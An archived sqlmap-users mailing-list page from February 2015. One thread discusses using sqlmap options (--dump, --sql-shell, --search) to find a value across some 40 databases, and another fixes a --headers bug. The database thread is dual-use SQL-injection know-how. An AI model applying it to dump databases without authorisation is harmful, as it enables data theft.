sqlmap-users Mailing List for sqlmap (Page 15)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: a d. <deh...@gm...> - 2015-02-04 15:40:12
|
this searchs in one table , How to say sql search in all tables (except writting all tables one by one ) On Wed, Feb 4, 2015 at 7:06 PM, Brandon Perry <bpe...@gm...> wrote: > You would be better off finding the most likely column to contain that > value, then select from table where column = 'value' > > On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote: > >> Yes i think it's the way , >> How may i search based on column value in all tables all columns ? >> >> >> On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: >> >>> try --sql-shell >>> >>> 2015-02-04 >>> ------------------------------ >>> is2reg >>> ------------------------------ >>> *发件人:*a dehqan <deh...@gm...> >>> *发送时间:*2015-02-04 23:20 >>> *主题:*Re: [sqlmap-users] Search based on fileds value >>> *收件人:*"Brandon Perry"<bpe...@gm...> >>> *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< >>> ra...@te...> >>> >>> Thanks >>> >>> You mean first dump all databases and then search in files ? >>> if yes i need a way without dumping all databases because database is >>> huge ofcourse about 40 databases . >>> >>> And may i use --thread or any other option to make it faster ? >>> >>> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm... >>> > wrote: >>> >>>> --dump then grep? >>>> >>>> >>>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >>>> >>>>> Hi >>>>> >>>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>>> >>>>> for exmample how to search in all databases for column with value of >>>>> 1232434345 ? >>>>> >>>>> >>>>> Regards >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>> is your >>>>> hub for all things parallel software development, from weekly thought >>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>> Take a >>>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:36:50
|
You would be better off finding the most likely column to contain that value, then select from table where column = 'value' On Wed, Feb 4, 2015 at 9:35 AM, a dehqan <deh...@gm...> wrote: > Yes i think it's the way , > How may i search based on column value in all tables all columns ? > > > On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: > >> try --sql-shell >> >> 2015-02-04 >> ------------------------------ >> is2reg >> ------------------------------ >> *发件人:*a dehqan <deh...@gm...> >> *发送时间:*2015-02-04 23:20 >> *主题:*Re: [sqlmap-users] Search based on fileds value >> *收件人:*"Brandon Perry"<bpe...@gm...> >> *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< >> ra...@te...> >> >> Thanks >> >> You mean first dump all databases and then search in files ? >> if yes i need a way without dumping all databases because database is >> huge ofcourse about 40 databases . >> >> And may i use --thread or any other option to make it faster ? >> >> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> >> wrote: >> >>> --dump then grep? >>> >>> >>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >>> >>>> Hi >>>> >>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>> >>>> for exmample how to search in all databases for column with value of >>>> 1232434345 ? >>>> >>>> >>>> Regards >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>> sponsored by Intel and developed in partnership with Slashdot Media, is >>>> your >>>> hub for all things parallel software development, from weekly thought >>>> leadership blogs to news, videos, case studies, tutorials and more. >>>> Take a >>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: a d. <deh...@gm...> - 2015-02-04 15:35:21
|
Yes i think it's the way , How may i search based on column value in all tables all columns ? On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote: > try --sql-shell > > 2015-02-04 > ------------------------------ > is2reg > ------------------------------ > *发件人:*a dehqan <deh...@gm...> > *发送时间:*2015-02-04 23:20 > *主题:*Re: [sqlmap-users] Search based on fileds value > *收件人:*"Brandon Perry"<bpe...@gm...> > *抄送:*", sqlmap-users"<sql...@li...>,"Raymond"< > ra...@te...> > > Thanks > > You mean first dump all databases and then search in files ? > if yes i need a way without dumping all databases because database is huge > ofcourse about 40 databases . > > And may i use --thread or any other option to make it faster ? > > On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> > wrote: > >> --dump then grep? >> >> >> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >> >>> Hi >>> >>> Guys , is there any way to search based on fileds value on sqlmap ? >>> >>> for exmample how to search in all databases for column with value of >>> 1232434345 ? >>> >>> >>> Regards >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:24:28
|
--search requires -C, -T, or -D, it doesn't take an argument as far as I know. --search will search for a table with LIKE or explicitly called "fdsa" if -T fdsa is specified On Wed, Feb 4, 2015 at 9:22 AM, Marcell Fodor <fod...@gm...> wrote: > --search "asd" > > > On Wed, Feb 4, 2015 at 3:20 PM, a dehqan <deh...@gm...> wrote: > >> Thanks >> >> You mean first dump all databases and then search in files ? >> if yes i need a way without dumping all databases because database is >> huge ofcourse about 40 databases . >> >> And may i use --thread or any other option to make it faster ? >> >> On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> >> wrote: >> >>> --dump then grep? >>> >>> >>> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >>> >>>> Hi >>>> >>>> Guys , is there any way to search based on fileds value on sqlmap ? >>>> >>>> for exmample how to search in all databases for column with value of >>>> 1232434345 ? >>>> >>>> >>>> Regards >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>> sponsored by Intel and developed in partnership with Slashdot Media, is >>>> your >>>> hub for all things parallel software development, from weekly thought >>>> leadership blogs to news, videos, case studies, tutorials and more. >>>> Take a >>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-02-04 15:23:12
|
There is no way how to do it from the sqlmap's side. You can use grep as Brandon mentioned. Bye On Wed, Feb 4, 2015 at 4:20 PM, a dehqan <deh...@gm...> wrote: > Thanks > > You mean first dump all databases and then search in files ? > if yes i need a way without dumping all databases because database is huge > ofcourse about 40 databases . > > And may i use --thread or any other option to make it faster ? > > On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> > wrote: > >> --dump then grep? >> >> >> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >> >>> Hi >>> >>> Guys , is there any way to search based on fileds value on sqlmap ? >>> >>> for exmample how to search in all databases for column with value of >>> 1232434345 ? >>> >>> >>> Regards >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Marcell F. <fod...@gm...> - 2015-02-04 15:22:54
|
--search "asd" On Wed, Feb 4, 2015 at 3:20 PM, a dehqan <deh...@gm...> wrote: > Thanks > > You mean first dump all databases and then search in files ? > if yes i need a way without dumping all databases because database is huge > ofcourse about 40 databases . > > And may i use --thread or any other option to make it faster ? > > On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> > wrote: > >> --dump then grep? >> >> >> On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: >> >>> Hi >>> >>> Guys , is there any way to search based on fileds value on sqlmap ? >>> >>> for exmample how to search in all databases for column with value of >>> 1232434345 ? >>> >>> >>> Regards >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: a d. <deh...@gm...> - 2015-02-04 15:20:57
|
Thanks You mean first dump all databases and then search in files ? if yes i need a way without dumping all databases because database is huge ofcourse about 40 databases . And may i use --thread or any other option to make it faster ? On Wed, Feb 4, 2015 at 6:45 PM, Brandon Perry <bpe...@gm...> wrote: > --dump then grep? > > > On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: > >> Hi >> >> Guys , is there any way to search based on fileds value on sqlmap ? >> >> for exmample how to search in all databases for column with value of >> 1232434345 ? >> >> >> Regards >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming. The Go Parallel Website, >> sponsored by Intel and developed in partnership with Slashdot Media, is >> your >> hub for all things parallel software development, from weekly thought >> leadership blogs to news, videos, case studies, tutorials and more. Take a >> look and join the conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > |
|
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:15:25
|
--dump then grep? On Wed, Feb 4, 2015 at 9:11 AM, a dehqan <deh...@gm...> wrote: > Hi > > Guys , is there any way to search based on fileds value on sqlmap ? > > for exmample how to search in all databases for column with value of > 1232434345 ? > > > Regards > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: a d. <deh...@gm...> - 2015-02-04 15:11:29
|
Hi Guys , is there any way to search based on fileds value on sqlmap ? for exmample how to search in all databases for column with value of 1232434345 ? Regards |
|
From: Brandon P. <bpe...@gm...> - 2015-02-02 21:23:20
|
Works like a charm, man. Thanks a bunch. :) On Mon, Feb 2, 2015 at 3:17 PM, Brandon Perry <bpe...@gm...> wrote: > Trying now. > > On Mon, Feb 2, 2015 at 3:07 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Fixed. Please update to the latest revision to have it patched. >> >> Bye >> >> On Mon, Feb 2, 2015 at 9:45 PM, Brandon Perry <bpe...@gm...> >> wrote: >> >>> I think it has to do with Accept specifically. >>> >>> Passing >>> --headers="X-Forwarded-For:192.168.1.31\nAccept:application/json" results >>> in the X-Forwarded-For header being present, but Accept is still text/html. >>> >>> I am using --data as well, so it is a POST. >>> >>> This is an application I am working on privately in my free time, so >>> willing to send any traffic information/commands off list. >>> >>> >>> On Mon, Feb 2, 2015 at 2:30 PM, Brandon Perry <bpe...@gm... >>> > wrote: >>> >>>> Ah! Let me try. >>>> >>>> On Mon, Feb 2, 2015 at 2:29 PM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> --headers='Accept: application/json' is wrongly handled by Python :) >>>>> >>>>> For some strange reason, it messes the sys.argv when there is a >>>>> whitespace inside a single-quote formation: >>>>> >>>>> python -c "import sys; print sys.argv" --dummy="foo: bar" >>>>> ['-c', '--dummy=foo: bar'] >>>>> >>>>> python -c "import sys; print sys.argv" --dummy='foo: bar' >>>>> ['-c', "--dummy='foo:", "bar'"] >>>>> >>>>> Bye >>>>> >>>>> On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar < >>>>> mir...@gm...> wrote: >>>>> >>>>>> I'll take a look in couple of hours and let you know. >>>>>> >>>>>> Bye >>>>>> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> >>>>>> wrote: >>>>>> >>>>>>> Hello! >>>>>>> >>>>>>> I am attempting to override the Accept header with Accept: >>>>>>> application/json (currently is text/html). >>>>>>> >>>>>>> When I use -r, I don't have a problem, but wanting to specify a >>>>>>> single command instead of command + request to reproduce. Using >>>>>>> --headers='Accept: application/json' doesn't override the default Accept: >>>>>>> text/html. Is this intended behavior? >>>>>>> >>>>>>> Thanks >>>>>>> >>>>>>> -- >>>>>>> http://volatile-minds.blogspot.com -- blog >>>>>>> http://www.volatileminds.net -- website >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>>>> is your >>>>>>> hub for all things parallel software development, from weekly thought >>>>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>>>> Take a >>>>>>> look and join the conversation now. >>>>>>> http://goparallel.sourceforge.net/ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>>> >>>>> >>>>> >>>>> -- >>>>> Miroslav Stampar >>>>> http://about.me/stamparm >>>>> >>>> >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2015-02-02 21:17:15
|
Trying now. On Mon, Feb 2, 2015 at 3:07 PM, Miroslav Stampar <mir...@gm... > wrote: > Fixed. Please update to the latest revision to have it patched. > > Bye > > On Mon, Feb 2, 2015 at 9:45 PM, Brandon Perry <bpe...@gm...> > wrote: > >> I think it has to do with Accept specifically. >> >> Passing --headers="X-Forwarded-For:192.168.1.31\nAccept:application/json" >> results in the X-Forwarded-For header being present, but Accept is still >> text/html. >> >> I am using --data as well, so it is a POST. >> >> This is an application I am working on privately in my free time, so >> willing to send any traffic information/commands off list. >> >> >> On Mon, Feb 2, 2015 at 2:30 PM, Brandon Perry <bpe...@gm...> >> wrote: >> >>> Ah! Let me try. >>> >>> On Mon, Feb 2, 2015 at 2:29 PM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> --headers='Accept: application/json' is wrongly handled by Python :) >>>> >>>> For some strange reason, it messes the sys.argv when there is a >>>> whitespace inside a single-quote formation: >>>> >>>> python -c "import sys; print sys.argv" --dummy="foo: bar" >>>> ['-c', '--dummy=foo: bar'] >>>> >>>> python -c "import sys; print sys.argv" --dummy='foo: bar' >>>> ['-c', "--dummy='foo:", "bar'"] >>>> >>>> Bye >>>> >>>> On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar < >>>> mir...@gm...> wrote: >>>> >>>>> I'll take a look in couple of hours and let you know. >>>>> >>>>> Bye >>>>> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> >>>>> wrote: >>>>> >>>>>> Hello! >>>>>> >>>>>> I am attempting to override the Accept header with Accept: >>>>>> application/json (currently is text/html). >>>>>> >>>>>> When I use -r, I don't have a problem, but wanting to specify a >>>>>> single command instead of command + request to reproduce. Using >>>>>> --headers='Accept: application/json' doesn't override the default Accept: >>>>>> text/html. Is this intended behavior? >>>>>> >>>>>> Thanks >>>>>> >>>>>> -- >>>>>> http://volatile-minds.blogspot.com -- blog >>>>>> http://www.volatileminds.net -- website >>>>>> >>>>>> >>>>>> ------------------------------------------------------------------------------ >>>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>>> is your >>>>>> hub for all things parallel software development, from weekly thought >>>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>>> Take a >>>>>> look and join the conversation now. >>>>>> http://goparallel.sourceforge.net/ >>>>>> _______________________________________________ >>>>>> sqlmap-users mailing list >>>>>> sql...@li... >>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>> >>>>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-02-02 21:08:02
|
Fixed. Please update to the latest revision to have it patched. Bye On Mon, Feb 2, 2015 at 9:45 PM, Brandon Perry <bpe...@gm...> wrote: > I think it has to do with Accept specifically. > > Passing --headers="X-Forwarded-For:192.168.1.31\nAccept:application/json" > results in the X-Forwarded-For header being present, but Accept is still > text/html. > > I am using --data as well, so it is a POST. > > This is an application I am working on privately in my free time, so > willing to send any traffic information/commands off list. > > > On Mon, Feb 2, 2015 at 2:30 PM, Brandon Perry <bpe...@gm...> > wrote: > >> Ah! Let me try. >> >> On Mon, Feb 2, 2015 at 2:29 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> --headers='Accept: application/json' is wrongly handled by Python :) >>> >>> For some strange reason, it messes the sys.argv when there is a >>> whitespace inside a single-quote formation: >>> >>> python -c "import sys; print sys.argv" --dummy="foo: bar" >>> ['-c', '--dummy=foo: bar'] >>> >>> python -c "import sys; print sys.argv" --dummy='foo: bar' >>> ['-c', "--dummy='foo:", "bar'"] >>> >>> Bye >>> >>> On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> I'll take a look in couple of hours and let you know. >>>> >>>> Bye >>>> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> >>>> wrote: >>>> >>>>> Hello! >>>>> >>>>> I am attempting to override the Accept header with Accept: >>>>> application/json (currently is text/html). >>>>> >>>>> When I use -r, I don't have a problem, but wanting to specify a single >>>>> command instead of command + request to reproduce. Using --headers='Accept: >>>>> application/json' doesn't override the default Accept: text/html. Is this >>>>> intended behavior? >>>>> >>>>> Thanks >>>>> >>>>> -- >>>>> http://volatile-minds.blogspot.com -- blog >>>>> http://www.volatileminds.net -- website >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>>> sponsored by Intel and developed in partnership with Slashdot Media, >>>>> is your >>>>> hub for all things parallel software development, from weekly thought >>>>> leadership blogs to news, videos, case studies, tutorials and more. >>>>> Take a >>>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>>> >>> >>> >>> -- >>> Miroslav Stampar >>> http://about.me/stamparm >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2015-02-02 20:46:02
|
I think it has to do with Accept specifically. Passing --headers="X-Forwarded-For:192.168.1.31\nAccept:application/json" results in the X-Forwarded-For header being present, but Accept is still text/html. I am using --data as well, so it is a POST. This is an application I am working on privately in my free time, so willing to send any traffic information/commands off list. On Mon, Feb 2, 2015 at 2:30 PM, Brandon Perry <bpe...@gm...> wrote: > Ah! Let me try. > > On Mon, Feb 2, 2015 at 2:29 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> --headers='Accept: application/json' is wrongly handled by Python :) >> >> For some strange reason, it messes the sys.argv when there is a >> whitespace inside a single-quote formation: >> >> python -c "import sys; print sys.argv" --dummy="foo: bar" >> ['-c', '--dummy=foo: bar'] >> >> python -c "import sys; print sys.argv" --dummy='foo: bar' >> ['-c', "--dummy='foo:", "bar'"] >> >> Bye >> >> On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar < >> mir...@gm...> wrote: >> >>> I'll take a look in couple of hours and let you know. >>> >>> Bye >>> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> >>> wrote: >>> >>>> Hello! >>>> >>>> I am attempting to override the Accept header with Accept: >>>> application/json (currently is text/html). >>>> >>>> When I use -r, I don't have a problem, but wanting to specify a single >>>> command instead of command + request to reproduce. Using --headers='Accept: >>>> application/json' doesn't override the default Accept: text/html. Is this >>>> intended behavior? >>>> >>>> Thanks >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> Dive into the World of Parallel Programming. The Go Parallel Website, >>>> sponsored by Intel and developed in partnership with Slashdot Media, is >>>> your >>>> hub for all things parallel software development, from weekly thought >>>> leadership blogs to news, videos, case studies, tutorials and more. >>>> Take a >>>> look and join the conversation now. http://goparallel.sourceforge.net/ >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2015-02-02 20:30:11
|
Ah! Let me try. On Mon, Feb 2, 2015 at 2:29 PM, Miroslav Stampar <mir...@gm... > wrote: > --headers='Accept: application/json' is wrongly handled by Python :) > > For some strange reason, it messes the sys.argv when there is a whitespace > inside a single-quote formation: > > python -c "import sys; print sys.argv" --dummy="foo: bar" > ['-c', '--dummy=foo: bar'] > > python -c "import sys; print sys.argv" --dummy='foo: bar' > ['-c', "--dummy='foo:", "bar'"] > > Bye > > On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> I'll take a look in couple of hours and let you know. >> >> Bye >> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> >> wrote: >> >>> Hello! >>> >>> I am attempting to override the Accept header with Accept: >>> application/json (currently is text/html). >>> >>> When I use -r, I don't have a problem, but wanting to specify a single >>> command instead of command + request to reproduce. Using --headers='Accept: >>> application/json' doesn't override the default Accept: text/html. Is this >>> intended behavior? >>> >>> Thanks >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >>> >>> ------------------------------------------------------------------------------ >>> Dive into the World of Parallel Programming. The Go Parallel Website, >>> sponsored by Intel and developed in partnership with Slashdot Media, is >>> your >>> hub for all things parallel software development, from weekly thought >>> leadership blogs to news, videos, case studies, tutorials and more. Take >>> a >>> look and join the conversation now. http://goparallel.sourceforge.net/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Miroslav S. <mir...@gm...> - 2015-02-02 20:29:37
|
